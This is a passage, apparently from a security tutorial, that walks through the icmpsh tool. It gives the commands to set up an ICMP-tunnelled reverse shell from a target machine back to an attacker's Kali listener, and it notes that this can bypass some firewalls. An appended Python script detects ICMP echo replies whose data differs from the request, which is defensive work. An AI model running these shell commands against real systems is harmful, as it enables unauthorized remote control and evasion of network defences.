First, install icmpsh on Kali. The repository is at https://github.com/inquisb/icmpsh.git
We can clone it directly with git:
git clone https://github.com/inquisb/icmpsh.git
Then we also need to install the python-impacket library, which provides access to TCP, UDP, ICMP and other protocols:
pip2 install impacket
Next, we also need to turn off the system's own ping responses, so that the kernel does not reply to ping packets itself:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
After the experiment is completed, turn the system's ping responses back on by changing the final 1 to 0.
Then you can start listening on Kali:
python icmpsh_m.py <local IP> <target IP>
Then transfer icmpsh.exe to the target machine and run it:
icmpsh.exe -t 192.168.110.140
-t is followed by the attacker’s IP address; press Enter to run the command.
The shell is received. Because the data is carried at the network layer in PING request/reply messages, there is no need to specify a service or port. This kind of traffic cannot be detected by proxy-based firewalls, so some firewall rules may be bypassed in this way.
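One way to look for this kind of traffic from the defender's side, as an added example that is not part of the original page or of icmpsh: RFC 792 requires an echo reply to return the request's data unchanged, so a responder that answers pings with data of its own (the reason the kernel's automatic replies were switched off above) shows up as a request/reply payload mismatch. The function names, the packet tuple format and the sample capture are assumptions constructed for illustration.

```python
import struct

def checksum(data: bytes) -> int:
    """RFC 1071 Internet checksum; 0 means the embedded checksum is valid."""
    data += b"\x00" * (len(data) % 2)  # pad to whole 16-bit words
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def build_echo(icmp_type, ident, seq, payload):
    """Build an ICMP echo message; used only to construct the sample data."""
    body = struct.pack("!HH", ident, seq) + payload
    csum = checksum(struct.pack("!BBH", icmp_type, 0, 0) + body)
    return struct.pack("!BBH", icmp_type, 0, csum) + body

def parse_echo(raw):
    """Return (type, ident, seq, payload), or None if not a valid echo message."""
    if len(raw) < 8 or raw[0] not in (0, 8) or raw[1] != 0 or checksum(raw) != 0:
        return None
    ident, seq = struct.unpack("!HH", raw[4:8])
    return raw[0], ident, seq, raw[8:]

def find_mismatched_replies(packets):
    """Flag echo replies whose data differs from the matching echo request."""
    pending, alerts = {}, []
    for src, dst, raw in packets:
        parsed = parse_echo(raw)
        if parsed is None:
            continue
        icmp_type, ident, seq, payload = parsed
        if icmp_type == 8:  # echo request: remember its data
            pending[(src, dst, ident, seq)] = payload
        else:  # echo reply: compare with the request it answers
            sent = pending.pop((dst, src, ident, seq), None)
            if sent is not None and sent != payload:
                alerts.append({"requester": dst, "responder": src, "seq": seq})
    return alerts

# Constructed sample capture (documentation-range IPs): (src, dst, ICMP bytes).
SAMPLE = [
    ("192.0.2.10", "192.0.2.20", build_echo(8, 1, 1, b"abcdefghijklmnop")),
    ("192.0.2.20", "192.0.2.10", build_echo(0, 1, 1, b"abcdefghijklmnop")),
    ("192.0.2.30", "192.0.2.40", build_echo(8, 1, 7, b"constructed request data")),
    ("192.0.2.40", "192.0.2.30", build_echo(0, 1, 7, b"different reply data")),
]

if __name__ == "__main__":
    print(find_mismatched_replies(SAMPLE))
```

In a real deployment the packet tuples would come from a capture or sensor feed, and the pending table would need a timeout so unanswered requests do not accumulate.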